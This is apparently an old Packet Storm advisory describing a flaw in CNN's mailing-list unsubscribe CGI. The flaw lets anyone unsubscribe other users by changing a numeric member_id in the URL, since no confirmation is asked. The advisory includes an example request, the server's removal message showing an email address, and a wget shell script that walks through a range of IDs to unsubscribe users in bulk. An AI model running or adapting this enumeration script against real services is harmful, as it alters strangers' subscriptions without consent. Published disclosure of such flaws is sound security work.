The CNN Unsubscribe Bot can Un-Subscribe other users from CNN's distribution list by placing a random number at the end of unsubscribe cgi URL's member_id.
53bf6534606c7051e8350cb44d7f0223e19984b7353c2376361378fa040f169fCNN List Un-Subscribe bot
# Date: 8/22/01
# Author: Jay Daniels <psaux@zdnetonebox.com>
PROBLEM:
Anyone can Un-Subscribe other users from CNN's distribution list by placing a
random number at the end of unsubscribe cgi URL's member_id.
CAUSE: There is no confirmation request! I can't remember if there is a
confirmation request when subscribing, if not then a similar method could be
used to post/subscribe others without their knowledge.
[example: quicknews]
http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=3465865
[output]
>User removed
>The email address jay@thecompany.com has been removed from the e-wiretext
>distribution list(s). This change should take effect within 24 hours.
I do not know the exact range for member_id so you can just start at [start_memid]
and go up.
Now you could make a simple shell script to do this using wget:
#!/bin/sh
# you may want to use a proxy or adjust wget options see %wget -h
# path for wget
path="/usr/bin"
if [ $# != 2 ]; then
echo "Usage: $0 [start_memid] [stop_memid]"
exit 1
fi
count=$(($1))
while [ "$count" -le "$2" ]; do
$path/wget -a $0.log http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=$count
count=$(($count + 1))
done
exit 0
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed